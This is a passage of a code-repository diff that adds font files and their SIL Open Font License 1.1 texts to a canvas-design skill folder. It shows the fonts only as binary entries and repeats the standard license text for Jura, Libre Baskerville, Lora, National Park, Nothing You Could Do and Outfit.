writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/JetBrainsMono-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/JetBrainsMono-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/Jura-Light.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/Jura-Light.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/Jura-Medium.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/Jura-Medium.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/Jura-OFL.txt
Normal file
93
skills/canvas-design/canvas-fonts/Jura-OFL.txt
Normal file
@@ -0,0 +1,93 @@
|
|||||||
|
Copyright 2019 The Jura Project Authors (https://github.com/ossobuffo/jura)
|
||||||
|
|
||||||
|
This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
93
skills/canvas-design/canvas-fonts/LibreBaskerville-OFL.txt
Normal file
93
skills/canvas-design/canvas-fonts/LibreBaskerville-OFL.txt
Normal file
@@ -0,0 +1,93 @@
|
|||||||
|
Copyright 2012 The Libre Baskerville Project Authors (https://github.com/impallari/Libre-Baskerville) with Reserved Font Name Libre Baskerville.
|
||||||
|
|
||||||
|
This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/LibreBaskerville-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/LibreBaskerville-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/Lora-Bold.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/Lora-Bold.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/Lora-BoldItalic.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/Lora-BoldItalic.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/Lora-Italic.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/Lora-Italic.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/Lora-OFL.txt
Normal file
93
skills/canvas-design/canvas-fonts/Lora-OFL.txt
Normal file
@@ -0,0 +1,93 @@
|
|||||||
|
Copyright 2011 The Lora Project Authors (https://github.com/cyrealtype/Lora-Cyrillic), with Reserved Font Name "Lora".
|
||||||
|
|
||||||
|
This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/Lora-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/Lora-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/NationalPark-Bold.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/NationalPark-Bold.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/NationalPark-OFL.txt
Normal file
93
skills/canvas-design/canvas-fonts/NationalPark-OFL.txt
Normal file
@@ -0,0 +1,93 @@
|
|||||||
|
Copyright 2025 The National Park Project Authors (https://github.com/benhoepner/National-Park)
|
||||||
|
|
||||||
|
This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/NationalPark-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/NationalPark-Regular.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/NothingYouCouldDo-OFL.txt
Normal file
93
skills/canvas-design/canvas-fonts/NothingYouCouldDo-OFL.txt
Normal file
@@ -0,0 +1,93 @@
|
|||||||
|
Copyright (c) 2010, Kimberly Geswein (kimberlygeswein.com)
|
||||||
|
|
||||||
|
This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/NothingYouCouldDo-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/NothingYouCouldDo-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/Outfit-Bold.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/Outfit-Bold.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/Outfit-OFL.txt
Normal file
93
skills/canvas-design/canvas-fonts/Outfit-OFL.txt
Normal file
@@ -0,0 +1,93 @@
|
|||||||
|
Copyright 2021 The Outfit Project Authors (https://github.com/Outfitio/Outfit-Fonts)
|
||||||
|
|
||||||
|
